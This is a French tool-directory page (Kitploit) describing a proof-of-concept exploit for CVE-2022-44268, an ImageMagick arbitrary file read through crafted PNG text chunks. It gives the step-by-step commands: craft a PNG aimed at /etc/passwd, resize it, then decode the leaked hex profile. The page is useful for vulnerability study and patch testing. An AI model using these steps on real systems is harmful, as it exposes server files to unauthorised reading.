Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2022-44268 — Exploit de preuve de concept pour la vulnérabilité de lecture arbitraire de fichiers dans ImageMagick (CVE-2022-44268) via des fragments de texte PNG conçus, permettant l'extraction de fichiers système lors des opérations de redimensionnement d'image. | Kitploit
Outils/GitHubGitHub/entr0pie/cve-2022-44268
Analyse des VulnérabilitésExploitationExploitation d'Applications WebCTFApprentissage et Éducation
GitHubentr0pie/cve-2022-44268

CVE-2022-44268

Exploit de preuve de concept pour la vulnérabilité de lecture arbitraire de fichiers dans ImageMagick (CVE-2022-44268) via des fragments de texte PNG conçus, permettant l'extraction de fichiers système lors des opérations de redimensionnement d'image.

Voir le dépôt
13144il y a 3 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2022-44268

Ce dépôt contient une preuve de concept (POC) pour une vulnérabilité dans ImageMagick (v. 7.1.0-49), une bibliothèque de manipulation d'images open-source largement utilisée. La vulnérabilité permet à un attaquant d'incorporer le contenu d'un fichier arbitraire dans une image redimensionnée lorsque ImageMagick analyse un fichier PNG.

Description

Lorsqu'ImageMagick effectue des opérations telles que le redimensionnement sur un fichier PNG, il peut inclure le contenu d'un fichier système, à condition que le binaire magick ait les permissions nécessaires pour le lire. Cette vulnérabilité résulte d'une mauvaise gestion des blocs textuels dans les fichiers PNG.

Un acteur malveillant peut exploiter cette vulnérabilité en créant un fichier PNG ou en utilisant un fichier existant et en ajoutant un bloc de type textuel (tEXt). Ces blocs sont constitués d'un mot-clé et d'une chaîne de texte. Dans ce cas, si le mot-clé correspond à la chaîne "profile" (sans guillemets), ImageMagick interprétera la chaîne de texte associée comme un nom de fichier et tentera de charger son contenu en tant que profil brut. Par conséquent, lors du téléchargement de l'image redimensionnée, celle-ci contiendra le contenu du fichier distant spécifié par l'attaquant.

Pour plus d'informations, voir cet article de MetabaseQ.

Preuve de Concept

Pour exploiter ImageMagick, générez un fichier PNG malveillant :

root@kitploit:~
python3 CVE-2022-44268.py /etc/passwd  # Create output.png

Ensuite, exécutez une opération de redimensionnement avec convert :

root@kitploit:~
convert output.png -resize 50% leak.png

Enfin, inspectez l'image leak et convertissez le Raw profile en hexadécimal :

root@kitploit:~
identify -verbose leak.png
# ...
Raw profile type:

    2367
726f6f743a783a303a303a726f6f743a2f726f6f743a2f6269 [...]
root@kitploit:~
python -c "print(bytes.fromhex('726f6f743a783a303a303a726f6f743a2f726f6f743a2f6269 [...]'))"

Note : Cette POC est destinée uniquement à des fins éducatives et informatives. Veuillez vous assurer que vous disposez des autorisations et de l'autorisation légale nécessaires avant de tester ou d'utiliser cette POC sur tout système.

Télécharger l’outil